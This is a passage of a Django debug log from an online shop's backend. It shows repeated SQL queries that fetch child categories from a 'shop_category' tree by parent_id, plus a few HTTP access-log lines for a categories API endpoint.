utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 11:44:37,941 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 11:44:37,944 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 11:44:37,947 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 11:44:37,949 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 11:44:37,951 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 11:44:37,953 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 11:44:37,955 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 11:44:37,959 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 11:44:37,961 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 11:44:37,963 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 11:44:37,965 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 11:44:37,967 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 11:44:37,971 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 11:44:37,973 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 11:44:37,975 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 11:44:37,977 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 11:44:37,979 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 11:44:37,983 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 11:44:37,985 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 11:44:37,987 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 11:44:37,990 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 11:44:37,992 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 11:44:37,994 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 11:44:37,997 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 11:44:37,999 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 11:44:38,002 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 11:44:38,005 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 11:44:38,007 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 11:44:38] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [19/Dec/2019 11:47:01] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-19 11:47:20,253 utils 4252 140031721535232 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 11:47:20,265 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 11:47:20,271 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 11:47:20,276 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 11:47:20,282 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 11:47:20,287 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 11:47:20,291 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 11:47:20,295 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 11:47:20,299 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 11:47:20,305 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 11:47:20,310 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 11:47:20,314 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 11:47:20,318 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 11:47:20,322 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 11:47:20,328 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 11:47:20,333 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 11:47:20,337 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 11:47:20,341 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 11:47:20,345 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 11:47:20,352 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 11:47:20,356 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 11:47:20,360 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 11:47:20,364 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 11:47:20,369 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 11:47:20,373 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 11:47:20,379 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 11:47:20,383 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 11:47:20,387 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 11:47:20,391 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 11:47:20,395 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 11:47:20,402 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 11:47:20,406 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 11:47:20,411 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 11:47:20,415 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 11:47:20,420 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 11:47:20,427 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 11:47:20,431 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 11:47:20,436 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 11:47:20,441 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", 